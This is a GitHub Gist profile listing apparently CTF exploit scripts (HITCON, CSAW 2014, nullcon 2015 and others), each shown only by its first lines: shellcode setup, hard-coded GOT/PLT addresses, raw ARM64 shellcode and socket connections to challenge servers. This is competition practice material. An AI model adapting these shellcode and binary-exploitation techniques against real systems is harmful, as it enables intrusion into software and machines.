Skip to content

Instantly share code, notes, and snippets.

g05u

Block or report user

Report or block g05u

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@g05u
g05u / xpl_callme.py
Last active Aug 29, 2015
Callme hitcon-ctf exploit
View xpl_callme.py
#!/usr/bin/env python
from nulllife import *
import struct
shellcode = NullShell(name = 'exec', arch = 'x86', os = 'linux').get()
stack_chk_got = 0x0804A018
message_data = 0x0804A070
@g05u
g05u / xpl_ty_hitcon.py
Created Aug 18, 2014
Exploit ty (aarch64 - arm64) Hitcon-ctf
View xpl_ty_hitcon.py
#!/usr/bin/env python
from struct import *
from nulllife import *
s = NullSocket("210.71.253.109", 9123)
#shell address is 0x411468
shellcode = struct.pack("<I", 0x90000000) #adrp x0, 0x411000
shellcode += struct.pack("<I", 0x91120000) #add x0, x0, #0x480
@g05u
g05u / xpl_rsbo.py
Created Aug 18, 2014
Hitcon-ctf rsbo exploit
View xpl_rsbo.py
#!/usr/bin/env python
from struct import *
from nulllife import *
new_ebp = 0x0804a100
plt_read = 0x080483E0
plt_open = 0x08048420
plt_write = 0x08048450
flag_str = 0x080487D0
View ncn_explicit_exploit.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#
#NoConName CTF
#explitcit exploit 500pts
#
s = NullSocket("88.87.208.163", 7070)
@g05u
g05u / csaw_2014_greenhorn_exploit.py
Created Sep 21, 2014
Exploit greenhornd CSAW 2014 CTF
View csaw_2014_greenhorn_exploit.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#greenhorn exploit
offset_data = 0x3F8
s = NullSocket("54.164.253.42", 9998)
s.readuntil("Password: ")
@g05u
g05u / csaw_2014_xorcise.py
Created Sep 21, 2014
CSAW CTF 2014 - xorcise exploit
View csaw_2014_xorcise.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#xorcise exploit
def xor(data, key):
o = ''
for i in range(len(data)):
@g05u
g05u / csaw_2014_s3.py
Created Sep 21, 2014
CSAW CTF 2014 - s3 exploit
View csaw_2014_s3.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#s3 exploit
s = NullSocket("54.165.225.121", 5333)
s.readuntil("> ")
@g05u
g05u / hackim_2015_mixme.py
Last active Aug 29, 2015
Hackim/nullcon CTF 2015 - mixme exploiting 400 points
View hackim_2015_mixme.py
#!/usr/bin/env python
from nulllife import *
import sys, time
# www.null-life.com
# write-up / exploit by @_g05u_
# Hackim/nullcon CTF 2015 - mixme exploiting 400 points
# Flag: aw3s0m3++_hipp1e_pwn_r0ckst4r
c = 0x61
@g05u
g05u / alewife_exploit.py
Last active Aug 29, 2015
Boston ctf party alewife writeup/exploit
View alewife_exploit.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
import ast
# @_g05u_
#boston ctf party 2015
# exploit alewife chall
# www.null-life.com
@g05u
g05u / quine_xpl.py
Created Apr 26, 2015
DragonSector CTF Quine Exploit
View quine_xpl.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
# DragonSector CTF
# exploit quine
# www.null-life.com / @_g05u_
def n2h(val, nbits = 32):
return ((val + (1 << nbits)) % (1 << nbits))
You can’t perform that action at this time.